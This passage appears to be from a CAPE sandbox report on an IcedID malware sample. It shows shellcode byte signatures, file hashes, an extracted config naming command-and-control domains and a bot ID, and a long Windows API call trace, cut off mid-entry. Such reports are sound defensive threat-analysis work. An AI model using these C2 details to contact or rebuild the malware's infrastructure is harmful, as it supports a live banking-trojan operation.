6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }", + "{ C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }", + "{ C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }", + "{ C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }" + ], + "addresses": { + "ss_small_bp": 1490 + } + } + ], + "cape_yara": [], + "clamav": [], + "tlsh": "T176411058E591B359F86150E8E3EA7E6B00398F50578004D7B2E2D8BE4D6ACE6663CC07", + "sha3_384": "ed3acdc3acd61e4b6780c0dce3c8c986b901ab8f43be69f4921658369d72a6a830039287dd762e14c058051d2cc58476", + "data": null, + "strings": [], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 9, + "cape_type": "Unpacked Shellcode", + "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe", + "process_name": "0b15348fb954e0b4331e.exe", + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe", + "pid": 9448, + "virtual_address": "0x02280000" + } + ], + "configs": [ + { + "IcedID": { + "family": [ + "IcedID" + ], + "version": [ + "1" + ], + "paths": [ + [ + { + "path": "/index.php", + "usage": "other" + } + ] + ], + "http": [ + [ + { + "uri": "kostacardsplayer.pro" + }, + { + "uri": "kostafootball.info" + }, + { + "uri": "countrylandlords.info" + }, + { + "uri": "landiscloudlord.red" + } + ] + ], + "other": [ + { + "Bot ID": "146076989" + } + ] + }, + "_associated_config_hashes": [ + { + "md5": "cd611f4aa43b076f84a8d1e70c9f4e12", + "sha1": "d10f4fa507d32fdb9a3826e48f14c52e95be11aa", + "sha256": "3436060c070f5e6ab9552f7a42d68e8c0cb0f08e8545237e5ba1d435103e636c", + "sha512": "7747b655c14f209d1c535feda4f8c4e3ffcaad0d363d12b2857cbe709034dbcf3e4ed335bc4bd978d83164e34e886aada6d1cc62bcf6bfb40930fb299411d45b", + "sha3_384": "82d2793fe2a13d0cf36f210582de845a76144b4e8c388a9e3b01f0c403a1bd96ae4f2c23d8f8465001b7b1e5909f6258" + }, + { + "md5": "28945efc5e67fa64058154179812e309", + "sha1": "f531081117d0094fdd2f5a8067da1714ea1b5c63", + "sha256": "1d35310b1dcdbab100973e739631c427753e0778179b90c1650d3aca48945d00", + "sha512": "53e2a155129d0c5c722647bdc5cef410b3a08cf5c3154481d335494544d7777b45bab4ef53d6abd57693ec0c06706378d761debd9b791f727f3789e672378a2c", + "sha3_384": "bdca137acd5954ffc09be67698e9c99c4419a016b5defe5354a190b35bf23666803a93b2f7c1dde528683a336a361fde" + } + ], + "_associated_analysis_hashes": { + "md5": "26e9b8b488a0e7a70b14149c3da88bb5", + "sha1": "fa5aae6d154f40083438831b5c017d95d1c64075", + "sha256": "0b15348fb954e0b4331e3f803185713786b747d2591ddb2a8526291e3bea14fe", + "sha512": "32f32561cd25bedfcbc07d733767c9405a1eee2dfa7acfe442fbae93a0c2de88fab8d5e3968107cab6dab3d5e7025ee19b60e88c7f62aa5aa14bbb94ba3067a7", + "sha3_384": "23a54432c18c2352f53fb489131e50813a1f2a856b319b931f69fe28fe57baf08e634f9fa2596541d69c90844a731deb" + } + } + ] + }, + "info": { + "version": "2.4-CAPE", + "started": "2025-03-07 22:41:03", + "ended": "2025-03-07 22:41:41", + "duration": 38, + "id": 3941, + "category": "file", + "custom": "", + "machine": { + "id": 3941, + "status": "stopping", + "name": "baseline", + "label": "win10-2", + "platform": "windows", + "manager": "KVM", + "started_on": "2025-03-07 22:41:03", + "shutdown_on": "2025-03-07 22:41:40" + }, + "package": "exe", + "timeout": false, + "shrike_url": null, + "shrike_refer": null, + "shrike_msg": null, + "shrike_sid": null, + "parent_id": null, + "tlp": null, + "parent_sample": {}, + "options": {}, + "source_url": null, + "route": "false", + "user_id": 0, + "CAPE_current_commit": "f89c890143b59bdbcc9b9c8b5e15fbc5fd827afd" + }, + "behavior": { + "processes": [ + { + "process_id": 9448, + "process_name": "0b15348fb954e0b4331e.exe", + "parent_id": 1628, + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe", + "first_seen": "2025-03-07 21:41:18,874", + "calls": [ + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x757393d9", + "parentcaller": "0x7703dda2", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\glu32" + }, + { + "name": "BaseAddress", + "value": "0x73910000" + }, + { + "name": "InitRoutine", + "value": "0x73942d70" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 0 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756c5701", + "parentcaller": "0x72f47dcf", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "gdi32" + }, + { + "name": "ModuleHandle", + "value": "0x76fa0000" + } + ], + "repeated": 0, + "id": 1 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76fa0000" + }, + { + "name": "FunctionName", + "value": "GdiAddGlsRecord" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76faa1c0" + } + ], + "repeated": 0, + "id": 2 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76fa0000" + }, + { + "name": "FunctionName", + "value": "GdiAddGlsBounds" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76faa1a0" + } + ], + "repeated": 0, + "id": 3 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76fa0000" + }, + { + "name": "FunctionName", + "value": "GdiIsMetaPrintDC" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76faa8f0" + } + ], + "repeated": 0, + "id": 4 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756d6ea1", + "parentcaller": "0x72f47e98", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7fdf0000" + }, + { + "name": "RegionSize", + "value": "0x00060000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 5 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x77020619", + "parentcaller": "0x7702010b", + "category": "system", + "api": "NtQueryLicenseValue", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" + }, + { + "name": "Type", + "value": "0x00000004" + } + ], + "repeated": 0, + "id": 6 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72f5ab69", + "parentcaller": "0x72f5aca2", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\opengl32" + }, + { + "name": "BaseAddress", + "value": "0x72f30000" + }, + { + "name": "InitRoutine", + "value": "0x73003c40" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 7 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x757393d9", + "parentcaller": "0x7703dda2", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\SHCore" + }, + { + "name": "BaseAddress", + "value": "0x76d00000" + }, + { + "name": "InitRoutine", + "value": "0x76d42480" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 8 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72f08c37", + "parentcaller": "0x72f073e7", + "category": "misc", + "api": "HeapCreate", + "status": true, + "return": "0x04ab0000", + "arguments": [ + { + "name": "Options", + "value": "0" + }, + { + "name": "InitialSize", + "value": "0x00001000" + }, + { + "name": "MaximumSize", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 9 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756b71bf", + "parentcaller": "0x72f084e1", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "KERNELBASE.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + } + ], + "repeated": 0, + "id": 10 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsAlloc" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756db050" + } + ], + "repeated": 0, + "id": 11 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsGetValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756ba9b0" + } + ], + "repeated": 0, + "id": 12 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsSetValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756c3040" + } + ], + "repeated": 0, + "id": 13 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsFree" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756de180" + } + ], + "repeated": 0, + "id": 14 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04ab1000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 15 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04ab2000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 16 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756b71bf", + "parentcaller": "0x72ebe285", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "LPK.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x72ea0000" + } + ], + "repeated": 0, + "id": 17 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756b71bf", + "parentcaller": "0x72ebe294", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "KERNEL32" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 18 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "ProcessIdToSessionId" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76111230" + } + ], + "repeated": 0, + "id": 19 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72ea6cbc", + "parentcaller": "0x72ebe2dc", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000068" + }, + { + "name": "uiParam", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 20 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x77043939", + "parentcaller": "0x7701d794", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x8c\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xd0\\xf3\\x19\\x00\\x1eolu\\xc4\\xf3\\x19\\x00\\x00\\x00\\x00\\x00@s\\xf0r&\\x00'\\x00\\xc4?\\xb6v\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00? \\x01\\x01\\x10\\xf4\\x19\\x00" + } + ], + "repeated": 0, + "id": 21 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x7701d7c7", + "parentcaller": "0x756dc167", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000026c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\REGISTRY\\USER\\S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 22 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72ea6dfb", + "parentcaller": "0x72ebe2dc", + "category": "misc", + "api": "GetSystemMetrics", + "status": true, + "return": "0x00000400", + "arguments": [ + { + "name": "SystemMetricIndex", + "value": "0" + } + ], + "repeated": 0, + "id": 23 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72ea6e08", + "parentcaller": "0x72ebe2dc", + "category": "misc", + "api": "GetSystemMetrics", + "status": true, + "return": "0x00000300", + "arguments": [ + { + "name": "SystemMetricIndex", + "value": "1" + } + ], + "repeated": 0, + "id": 24 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72ea6e3e", + "parentcaller": "0x72ebe2dc", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000029" + }, + { + "name": "uiParam", + "value": "0x000001f4" + } + ], + "repeated": 0, + "id": 25 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72ea6eaf", + "parentcaller": "0x72ebe2dc", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000066" + }, + { + "name": "uiParam", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 26 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72ea6ec6", + "parentcaller": "0x72ebe2dc", + "category": "registry", + "api": "RegCloseKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000026c" + } + ], + "repeated": 0, + "id": 27 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756b8236", + "parentcaller": "0x756dd921", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "imm32.dll" + }, + { + "name": "BaseAddress", + "value": "0x74eb0000" + } + ], + "repeated": 0, + "id": 28 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmCreateContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb7770" + } + ], + "repeated": 0, + "id": 29 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmDestroyContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb77e0" + } + ], + "repeated": 0, + "id": 30 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmNotifyIME" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74ebbc30" + } + ], + "repeated": 0, + "id": 31 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmAssociateContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb5150" + } + ], + "repeated": 0, + "id": 32 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmReleaseContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb4e80" + } + ], + "repeated": 0, + "id": 33 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmGetContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb3b30" + } + ], + "repeated": 0, + "id": 34 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmGetCompositionStringA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb84b0" + } + ], + "repeated": 0, + "id": 35 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmSetCompositionStringA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb9050" + } + ], + "repeated": 0, + "id": 36 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmGetCompositionStringW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb8550" + } + ], + "repeated": 0, + "id": 37 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmSetCompositionStringW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb9080" + } + ], + "repeated": 0, + "id": 38 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmSetCandidateWindow" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb8d60" + } + ], + "repeated": 0, + "id": 39 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\comctl32" + }, + { + "name": "BaseAddress", + "value": "0x72ea0000" + }, + { + "name": "InitRoutine", + "value": "0x72f07340" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 40 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x77017c50", + "parentcaller": "0x756a2f24", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\comdlg32" + }, + { + "name": "BaseAddress", + "value": "0x75260000" + }, + { + "name": "InitRoutine", + "value": "0x752a2290" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 41 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396758f", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "218" + }, + { + "name": "FunctionAddress", + "value": "0x7395cb80" + } + ], + "repeated": 0, + "id": 42 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739675a0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "217" + }, + { + "name": "FunctionAddress", + "value": "0x73989d30" + } + ], + "repeated": 0, + "id": 43 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739675b1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetDefaultPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73987130" + } + ], + "repeated": 0, + "id": 44 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739675c2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetDefaultPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395ec70" + } + ], + "repeated": 0, + "id": 45 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739675d3", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDriverPackagePathW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398f8a0" + } + ], + "repeated": 0, + "id": 46 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739675e4", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": 